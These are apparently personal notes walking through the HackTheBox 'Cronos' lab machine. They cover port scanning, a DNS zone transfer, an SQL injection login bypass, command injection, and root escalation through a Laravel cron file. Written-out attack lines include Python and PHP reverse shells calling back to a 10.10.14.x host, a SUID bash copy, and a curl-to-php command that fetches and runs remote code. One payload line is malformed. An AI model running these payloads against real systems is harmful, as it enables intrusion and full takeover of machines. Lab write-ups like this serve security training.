nmap:

Host is up (0.11s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP enum:

• Default server page found for apache2

try doing nslookup:

commands: nslookup

type: server

now that we see that it's hosting cronos.htb, let's try some zone transfer to discover any other subdomains.

dig AXFR cronos.htb @IP

Go buster didn't have luck.

save the found sub-domains to /etc/hosts

Found the admin page.

try the sql injection

save the post request as login.req and do

sqlmap -r login.req

redirecting happening/

tried using '-- - in the user section and it worked! (intercept the traffic in the burpsuite and url encode it)

now we can execute any commands!

Adjusting the command section in the burpsuite, I was able to execute a command.

Let's try a one liner to get a reverse shell.

tried

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.131",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Make sure to url encode it. got the reverse shell!

called the shell with python -c 'import pty; pty.spawn("/bin/sh")'

PrevEsc

• host the linpeas.sh and run it

Found a suspicious cronjob

php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

where we can find a kernel cron job:

"app/Console/Kernel.php"

https://vegibit.com/scheduling-commands-and-tasks-in-laravel/

how to set up a cronjob that contains terminal commands

    protected function schedule(Schedule $schedule)
    {
        $schedule->exec('cd ~/Code/lpg && ls')
            ->everyMinute()
            ->sendOutputTo('/home/vagrant/Code/lpg/listing.txt');
    }

find / -name Kernel.php 2>/dev/null

$schedule->exec('php -r '$sock=fsockopen("10.10.14.131",7777);exec("/bin/sh -i <&3 >&3 2>&3");')->everyMinute();php -r '$sock=fsockopen("10.10.14.131",7777);exec("/bin/sh -i <&3 >&3 2>&3");'

I located the file in the html and downloaded by visiting the site.

https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/

Used this guy's method:

let’s just make a temporary copy of bash (as root) and give it the SUID bit.

We add the following code to Kernel.php…

protected function schedule(Schedule $schedule)
{
    $cmd = 'cp $(which bash) /tmp/sbash; chmod +s /tmp/sbash';
    $schedule->exec($cmd)->everyMinute();
}

…then wait a minute for the cron and eventually execute ./sbash -p from /tmp.

Another method would be to edit the artisan file and let the system download a reverseshell from our host and execute it.

<?php system('curl http://10.10.14.57/reverse.php | php') ?>